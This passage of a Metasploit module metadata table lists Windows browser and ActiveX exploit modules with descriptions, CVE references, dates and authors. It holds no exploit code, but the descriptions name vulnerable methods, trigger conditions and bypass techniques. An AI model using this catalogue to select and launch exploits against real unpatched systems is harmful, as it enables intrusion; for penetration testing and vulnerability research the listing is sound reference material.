CPropertyStorage::ReadMultiple function. A Visio document with a specially crafted Summary Information Stream embedded allows to get remote code execution through Internet Explorer, on systems with Visio Viewer installed.","Metasploit Framework License (BSD)","f","2011-12-13 00:00:00",0,,"passive","t","BID-50977, CVE-2011-3400, MSB-MS11-093, OSVDB-77663, URL-http://aluigi.org/adv/ole32_1-adv.txt, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966","Luigi Auriemma, juan vazquez " 486,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_004_midi.rb","exploit","windows/browser/ms12_004_midi","exploit/windows/browser/ms12_004_midi","MS12-004 midiOutPlayNextPolyEvent Heap Overflow",300,"This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either ""inc al"" or ""dec al"" a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, msvcrt ROP is used by default. However, if you know your target's patch level, you may also try the 'MSHTML' advanced option for an info leak based attack. Currently, this module only supports two MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3. Or 8.0.6001.19120, which is patch level before the MS12-004 fix. Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.","Metasploit Framework License (BSD)","f","2012-01-10 00:00:00",0,,"passive","t","BID-51292, CVE-2012-0003, MSB-MS12-004, OSVDB-78210, URL-http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php","Shane Garrett, juan vazquez , sinn3r " 487,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_037_ie_colspan.rb","exploit","windows/browser/ms12_037_ie_colspan","exploit/windows/browser/ms12_037_ie_colspan","Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",300,"This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","BID-53848, CVE-2012-1876, MSB-MS12-037, OSVDB-82866, URL-http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php","Alexandre Pelletier, binjo, juan vazquez , mr_me , sinn3r " 488,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms12_037_same_id.rb","exploit","windows/browser/ms12_037_same_id","exploit/windows/browser/ms12_037_same_id","MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",300,"This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging as well as the heap spray method seen in the wild (Java msvcrt71.dll).","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","CVE-2012-1875, MSB-MS12-037, OSVDB-82865, URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities, URL-https://twitter.com/binjo/status/212795802974830592","Dark Son, Google Inc., Qihoo 360 Security Center, Yichong Lin, juan vazquez " 489,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb","exploit","windows/browser/ms13_009_ie_slayoutrun_uaf","exploit/windows/browser/ms13_009_ie_slayoutrun_uaf","MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",300,"This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.","Metasploit Framework License (BSD)","f","2013-02-13 00:00:00",0,,"passive","t","CVE-2013-0025, MSB-MS13-009, URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf","Scott Bell " 490,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/msvidctl_mpeg2.rb","exploit","windows/browser/msvidctl_mpeg2","exploit/windows/browser/msvidctl_mpeg2","Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",300,"This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid","Metasploit Framework License (BSD)","f","2009-07-05 00:00:00",0,,"passive","t","BID-35558, CVE-2008-0015, MSB-MS09-032, MSB-MS09-037, OSVDB-55651, URL-http://www.microsoft.com/technet/security/advisory/972890.mspx","Trancer " 491,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mswhale_checkforupdates.rb","exploit","windows/browser/mswhale_checkforupdates","exploit/windows/browser/mswhale_checkforupdates","Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-04-15 00:00:00",0,,"passive","t","CVE-2007-2238, OSVDB-53933, URL-http://technet.microsoft.com/en-us/library/dd282918.aspx","MC " 492,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb","exploit","windows/browser/msxml_get_definition_code_exec","exploit/windows/browser/msxml_get_definition_code_exec","MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",400,"This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution.","Metasploit Framework License (BSD)","f","2012-06-12 00:00:00",0,,"passive","t","BID-53934, CVE-2012-1889, MSB-MS12-043, OSVDB-82873, URL-http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html, URL-http://technet.microsoft.com/en-us/security/advisory/2719615, URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities","binjo, inking26, juan vazquez , sinn3r " 493,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb","exploit","windows/browser/nctaudiofile2_setformatlikesample","exploit/windows/browser/nctaudiofile2_setformatlikesample","NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow",300,"This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX Control provided by various audio applications. By sending an overly long string to the ""SetFormatLikeSample()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-01-24 00:00:00",0,,"passive","t","BID-22196, CVE-2007-0018, OSVDB-32032, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html, US-CERT-VU-292713","MC , dookie, jduck " 494,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nis2004_antispam.rb","exploit","windows/browser/nis2004_antispam","exploit/windows/browser/nis2004_antispam","Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Norton AntiSpam 2004. When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2004-03-19 00:00:00",0,,"passive","t","BID-9916, CVE-2004-0363, OSVDB-6249","MC " 495,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/nis2004_get.rb","exploit","windows/browser/nis2004_get","exploit/windows/browser/nis2004_get","Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. By sending a overly long string to the ""Get()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-05-16 00:00:00",0,,"passive","t","CVE-2007-1689, OSVDB-36164, URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html","MC " 496,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/notes_handler_cmdinject.rb","exploit","windows/browser/notes_handler_cmdinject","exploit/windows/browser/notes_handler_cmdinject","IBM Lotus Notes Client URL Handler Command Injection",600,"This modules exploits a command injection vulnerability in the URL handler for for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with an specially crafted notes:// URL to execute arbitrary commands with also arbitrary arguments. This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.","Metasploit Framework License (BSD)","f","2012-06-18 00:00:00",0,,"passive","t","BID-54070, CVE-2012-2174, OSVDB-83063, URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html, URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-154/","Moritz Jodeit, Sean de Regge, juan vazquez " 497,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb","exploit","windows/browser/novell_groupwise_gwcls1_actvx","exploit/windows/browser/novell_groupwise_gwcls1_actvx","Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",300,"This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll ActiveX. Several methods in the GWCalServer control use user provided data as a pointer, which allows to read arbitrary memory and execute arbitrary code. This module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The JRE6 needs to be installed to achieve ASLR bypass.","Metasploit Framework License (BSD)","f","2013-01-30 00:00:00",0,,"passive","t","BID-57658, CVE-2012-0439, OSVDB-89700, URL-http://www.novell.com/support/kb/doc.php?id=7011688, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-008","juan vazquez , rgod " 498,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_callbackurl.rb","exploit","windows/browser/novelliprint_callbackurl","exploit/windows/browser/novelliprint_callbackurl","Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. When sending an overly long string to the 'call-back-url' parameter in an op-client-interface-version action of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-20 00:00:00",0,,"passive","t","CVE-2010-1527, EDB-15042, OSVDB-67411, URL-http://secunia.com/secunia_research/2010-104/","Trancer " 499,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_datetime.rb","exploit","windows/browser/novelliprint_datetime","exploit/windows/browser/novelliprint_datetime","Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing a specially crafted date/time string via certain parameters to ienipp.ocx an attacker can execute arbitrary code. NOTE: The ""operation"" variable must be set to a valid command in order to reach this vulnerability.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"passive","t","BID-37242, CVE-2009-1569, OSVDB-60804, URL-http://secunia.com/advisories/35004/","jduck " 500,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_executerequest.rb","exploit","windows/browser/novelliprint_executerequest","exploit/windows/browser/novelliprint_executerequest","Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When sending an overly long string to the ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-22 00:00:00",0,,"passive","t","BID-27939, CVE-2008-0935, OSVDB-42063","MC " 501,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb","exploit","windows/browser/novelliprint_executerequest_dbg","exploit/windows/browser/novelliprint_executerequest_dbg","Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40. When sending an overly long string to the 'debug' parameter in ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-04 00:00:00",0,,"passive","t","CVE-2010-3106, EDB-15001, OSVDB-66960, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06","Trancer " 502,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_getdriversettings.rb","exploit","windows/browser/novelliprint_getdriversettings","exploit/windows/browser/novelliprint_getdriversettings","Novell iPrint Client ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-06-16 00:00:00",0,,"passive","t","CVE-2008-2908, OSVDB-46194, URL-http://secunia.com/advisories/30709/","MC " 503,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb","exploit","windows/browser/novelliprint_getdriversettings_2","exploit/windows/browser/novelliprint_getdriversettings_2","Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"passive","t","BID-44966, CVE-2010-4321, EDB-16014, OSVDB-69357, URL-http://www.novell.com/support/viewContent.do?externalId=7007234, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-256/","Dr_IDE, mr_me " 504,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/novelliprint_target_frame.rb","exploit","windows/browser/novelliprint_target_frame","exploit/windows/browser/novelliprint_target_frame","Novell iPrint Client ActiveX Control target-frame Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the ""target-frame"" parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The ""operation"" variable must be set to a valid command in order to reach this vulnerability.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"passive","t","BID-37242, CVE-2009-1568, OSVDB-60803, URL-http://secunia.com/advisories/37169/","jduck " 505,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ntr_activex_check_bof.rb","exploit","windows/browser/ntr_activex_check_bof","exploit/windows/browser/ntr_activex_check_bof","NTR ActiveX Control Check() Method Buffer Overflow",300,"This module exploits a vulnerability found in NTR ActiveX 1.1.8. The vulnerability exists in the Check() method, due to the insecure usage of strcat to build a URL using the bstrParams parameter contents (note: this is also the reason why the module won't allow you to modify the URIPATH), which leads to code execution under the context of the user visiting a malicious web page. In order to bypass DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51374, CVE-2012-0266, OSVDB-78252, URL-http://secunia.com/secunia_research/2012-1/","Carsten Eiram, juan vazquez " 506,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ntr_activex_stopmodule.rb","exploit","windows/browser/ntr_activex_stopmodule","exploit/windows/browser/ntr_activex_stopmodule","NTR ActiveX Control StopModule() Remote Code Execution",300,"This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The vulnerability exists in the StopModule() method, where the lModule parameter is used to dereference memory to get a function pointer, which leads to code execution under the context of the user visiting a malicious web page.","Metasploit Framework License (BSD)","f","2012-01-11 00:00:00",0,,"passive","t","BID-51374, CVE-2012-0267, OSVDB-78253, URL-http://secunia.com/secunia_research/2012-2/","Carsten Eiram, juan vazquez " 507,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb","exploit","windows/browser/oracle_autovue_setmarkupmode","exploit/windows/browser/oracle_autovue_setmarkupmode","Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",300,"This module exploits a vulnerability found in the AutoVue.ocx ActiveX control. The vulnerability, due to the insecure usage of an strcpy like function in the SetMarkupMode method, when handling a specially crafted sMarkup argument, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page. The module has been successfully tested against Oracle AutoVue Desktop Version 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and ASLR bypass).","Metasploit Framework License (BSD)","f","2012-04-18 00:00:00",0,,"passive","t","BID-53077, CVE-2012-0549, OSVDB-81439, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05, URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549","Brian Gorenc, juan vazquez " 508,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb","exploit","windows/browser/oracle_dc_submittoexpress","exploit/windows/browser/oracle_dc_submittoexpress","Oracle Document Capture 10g ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control emsmtp.dll (6.0.1.0). When passing a overly long string to the method ""SubmitToExpress"" an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-28 00:00:00",0,,"passive","t","BID-25467, CVE-2007-4607, OSVDB-38335, US-CERT-VU-281977","MC " 509,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/orbit_connecting.rb","exploit","windows/browser/orbit_connecting","exploit/windows/browser/orbit_connecting","Orbit Downloader Connecting Log Creation Buffer Overflow",300,"This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an attacker serves up a malicious web site, abritrary code may be executed. The PAYLOAD windows/shell_bind_tcp works best.","Metasploit Framework License (BSD)","f","2009-02-03 00:00:00",0,,"passive","t","BID-33894, CVE-2009-0187, OSVDB-52294","MC " 510,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ovftool_format_string.rb","exploit","windows/browser/ovftool_format_string","exploit/windows/browser/ovftool_format_string","VMWare OVF Tools Format String Vulnerability",300,"This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-08 00:00:00",0,,"passive","t","BID-56468, CVE-2012-3569, OSVDB-87117, URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html","Jeremy Brown, juan vazquez " 511,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/pcvue_func.rb","exploit","windows/browser/pcvue_func","exploit/windows/browser/pcvue_func","PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",200,"This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0. By setting a dword value for the SaveObject() or LoadObject(), an attacker can overwrite a function pointer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-10-05 00:00:00",0,,"passive","t","BID-49795, CVE-2008-4915, URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt","Luigi Auriemma, TecR0c , mr_me " 512,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/persits_xupload_traversal.rb","exploit","windows/browser/persits_xupload_traversal","exploit/windows/browser/persits_xupload_traversal","Persits XUpload ActiveX MakeHttpRequest Directory Traversal",600,"This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing ""..\"" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler since a user would have to log for the payloda to execute.","Metasploit Framework License (BSD)","f","2009-09-29 00:00:00",0,,"passive","t","CVE-2009-3693, OSVDB-60001, URL-http://retrogod.altervista.org/9sg_hp_loadrunner.html","jduck " 513,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/quickr_qp2_bof.rb","exploit","windows/browser/quickr_qp2_bof","exploit/windows/browser/quickr_qp2_bof","IBM Lotus QuickR qp2 ActiveX Buffer Overflow",300,"This module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the ""Attachment_Times"" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the qp2.dll installed with the IBM Lotus Quickr product. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with the qp2 ActiveX.","Metasploit Framework License (BSD)","f","2012-05-23 00:00:00",0,,"passive","t","BID-53678, CVE-2012-2176, OSVDB-82166, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-134/","Gaurav Baruah, juan vazquez " 514,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/real_arcade_installerdlg.rb","exploit","windows/browser/real_arcade_installerdlg","exploit/windows/browser/real_arcade_installerdlg","Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",300,"This module exploits a vulnerability in Real Networks Acrade Game's ActiveX control. The ""exec"" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands on the victim machine.","Metasploit Framework License (BSD)","f","2011-04-03 00:00:00",0,,"passive","t","EDB-17105, OSVDB-71559","rgod, sinn3r " 515,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_cdda_uri.rb","exploit","windows/browser/realplayer_cdda_uri","exploit/windows/browser/realplayer_cdda_uri","RealNetworks RealPlayer CDDA URI Initialization Vulnerability",300,"This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"passive","t","BID-44144, CVE-2010-3747, OSVDB-68673, URL-http://service.real.com/realplayer/security/10152010_player/en/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-210/","bannedit , sinn3r " 516,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_console.rb","exploit","windows/browser/realplayer_console","exploit/windows/browser/realplayer_console","RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",300,"This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-03-08 00:00:00",0,,"passive","t","BID-28157, CVE-2008-1309, OSVDB-42946, URL-http://secunia.com/advisories/29315/","Elazar Broad " 517,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_import.rb","exploit","windows/browser/realplayer_import","exploit/windows/browser/realplayer_import","RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",300,"This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the ""Import()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-10-18 00:00:00",0,,"passive","t","BID-26130, CVE-2007-5601, OSVDB-41430","MC " 518,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_qcp.rb","exploit","windows/browser/realplayer_qcp","exploit/windows/browser/realplayer_qcp","RealNetworks Realplayer QCP Parsing Heap Overflow",200,"This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted ""fmt"" chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.","Metasploit Framework License (BSD)","f","2011-08-16 00:00:00",0,,"passive","t","BID-49172, CVE-2011-2950, OSVDB-74549, URL-http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html, URL-http://service.real.com/realplayer/security/08162011_player/en/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-265/","Sean de Regge, juan vazquez " 519,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/realplayer_smil.rb","exploit","windows/browser/realplayer_smil","exploit/windows/browser/realplayer_smil","RealNetworks RealPlayer SMIL Buffer Overflow",300,"This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8. By creating a URL link to a malicious SMIL file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.smil'. This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8 build 6.0.9.584.","Metasploit Framework License (BSD)","f","2005-03-01 00:00:00",0,,"passive","t","BID-12698, CVE-2005-0455, OSVDB-14305","MC " 520,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/roxio_cineplayer.rb","exploit","windows/browser/roxio_cineplayer","exploit/windows/browser/roxio_cineplayer","Roxio CinePlayer ActiveX Control Buffer Overflow",300,"This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to 'DiskType', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-04-11 00:00:00",0,,"passive","t","BID-23412, CVE-2007-1559, OSVDB-34779","Trancer " 521,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/safari_xslt_output.rb","exploit","windows/browser/safari_xslt_output","exploit/windows/browser/safari_xslt_output","Apple Safari Webkit libxslt Arbitrary File Creation",600,"This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be acheived by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS.","Metasploit Framework License (BSD)","f","2011-07-20 00:00:00",0,,"passive","t","CVE-2011-1774, OSVDB-74017, URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html","Nicolas Gregoire" 522,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb","exploit","windows/browser/samsung_neti_wiewer_backuptoavi_bof","exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof","Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow",300,"This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed with the Samsung NET-i viewer 1.37. Specifically, when supplying a long string for the fname parameter to the BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer overflow due to the use of memcpy with an incorrect size, resulting in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-21 00:00:00",0,,"passive","t","BID-53193, OSVDB-81453, URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt","Luigi Auriemma, juan vazquez " 523,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb","exploit","windows/browser/sapgui_saveviewtosessionfile","exploit/windows/browser/sapgui_saveviewtosessionfile","SAP AG SAPgui EAI WebViewer3D Buffer Overflow",300,"This module exploits a stack buffer overflow in Siemens Unigraphics Solutions Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled with SAPgui. When passing an overly long string the SaveViewToSessionFile() method, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2009-03-31 00:00:00",0,,"passive","t","CVE-2007-4475, OSVDB-53066, US-CERT-VU-985449","MC " 524,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/softartisans_getdrivename.rb","exploit","windows/browser/softartisans_getdrivename","exploit/windows/browser/softartisans_getdrivename","SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-08-25 00:00:00",0,,"passive","t","BID-30826, CVE-2007-1682, OSVDB-47794, US-CERT-VU-914785","MC " 525,"2013-05-07 